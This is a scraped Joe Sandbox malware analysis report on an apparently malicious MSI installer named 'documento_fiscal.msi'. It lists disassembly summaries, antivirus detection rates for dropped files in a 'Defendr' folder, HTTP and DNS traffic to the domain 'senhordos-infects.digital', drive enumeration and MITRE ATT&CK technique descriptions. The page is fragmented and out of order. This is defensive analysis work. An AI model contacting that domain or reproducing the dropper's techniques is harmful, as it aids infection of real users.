Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 6828bc91f183839a9b9354d54c8480913408648f3f41bf3e101c9589fa3100ea
Instruction ID: 3ed95e74d7dd8a7dd97ba528327c14371f4898297fcc25132ea713131666f77c
Opcode Fuzzy Hash: 6828bc91f183839a9b9354d54c8480913408648f3f41bf3e101c9589fa3100ea
Instruction Fuzzy Hash: 1A11D371900B45AFCB20EFB4D851B8AB7F4EF19300F04851AE5A58B251EB30E508CB70

Function 00D51E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D50B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,7EBC463A,?,00D893B0,000000FF), ref: 00D50B27
Part of subcall function 00D50B00: GetLastError.KERNEL32(?,00000000,00000000,7EBC463A,?,00D893B0,000000FF), ref: 00D50B31

IsDebuggerPresent.KERNEL32(?,?,00D9FAD8), ref: 00D51E48
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00D9FAD8), ref: 00D51E57

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D51E52

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: f42c1b3bbc4ac54dd54bdbf3a7d53b9e4862e877d95020ff0f787bfb5208a87c
Instruction ID: c06bb7664c6484b8d20cce308047c2ad7faad26d43c12c3f13ec10f3286649de
Opcode Fuzzy Hash: f42c1b3bbc4ac54dd54bdbf3a7d53b9e4862e877d95020ff0f787bfb5208a87c
Instruction Fuzzy Hash: F3E065746007018FC720AF29E909746BBE5AF05B06F40881DEC92C67C0EBB4E808CBB2

Function 00D46C20 Relevance: 5.2, APIs: 4, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,40000022,7EBC463A,?,00000000,?,?,?,?,00D89DA0,000000FF,?,00D46432,00000000,?), ref: 00D46CC4
LocalAlloc.KERNEL32(00000040,3FFFFFFF,7EBC463A,?,00000000,?,?,?,?,00D89DA0,000000FF,?,00D46432,00000000,?), ref: 00D46CE7
LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00D89DA0,000000FF,?,00D46432,00000000), ref: 00D46D87
LocalFree.KERNEL32(?,7EBC463A,00000000,00D893B0,000000FF,?,00000000,00000000,00D89DA0,000000FF,7EBC463A), ref: 00D46E0D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 7144e831ab3129abdca9d2c962eb6896de7a816e7187c28e839973c1ed5700f5
Instruction ID: 0c6166d88660a466a6d6427f9005bbfa6ebb14c87719eb6cb8fa24e7aff48d99
Opcode Fuzzy Hash: 7144e831ab3129abdca9d2c962eb6896de7a816e7187c28e839973c1ed5700f5
Instruction Fuzzy Hash: F3517EB5E002059FDB18DF68C985AAEBBB5FB49710F14422DE926E7380D731E900CBA5

Function 00D44A80 Relevance: 5.2, APIs: 4, Instructions: 169memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00D44B05
LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00D44B25
LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00D44BAB
LocalFree.KERNEL32(00000000,7EBC463A,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00D44C2D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 0ed68138854e4954ea5d6253a1314bb77eb062b23757be0c6c261c357cdce5f4
Instruction ID: 3be0094dd31171c256613f8a9a5978d39aeaa30c1cb479ed65876d8f9216cc45
Opcode Fuzzy Hash: 0ed68138854e4954ea5d6253a1314bb77eb062b23757be0c6c261c357cdce5f4
Instruction Fuzzy Hash: 2A51BD726042159FC714DF28DC85B6AB7E9EF88320F140A6EF866D7390DB70E9448BB1

Source: C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe	Virustotal: Detection: 60%	Perma Link

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S1a7AvczmF99nUk&MD=xPt65TWF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S1a7AvczmF99nUk&MD=xPt65TWF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /clientesnew/inspecionando.php HTTP/1.1Host: senhordos-infects.digitalConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: senhordos-infects.digitalConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://senhordos-infects.digital/clientesnew/inspecionando.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: senhordos-infects.digital
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report documento_fiscal.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\58791d.rbs

C:\Users\user\AppData\Local\Temp\MSI87812.LOG

C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll

C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe

C:\Users\user\AppData\Roaming\Defendr\cont.cmd

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv0.0.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv0.1.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv0.2.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv1.1.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv1.2.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv1.3.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv10.0.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv10.1.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv11.0.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv11.1.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv12.0.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv12.1.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv13.0.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv13.1.tv

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv14.0.tv

Windows Analysis Report
documento_fiscal.msi

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre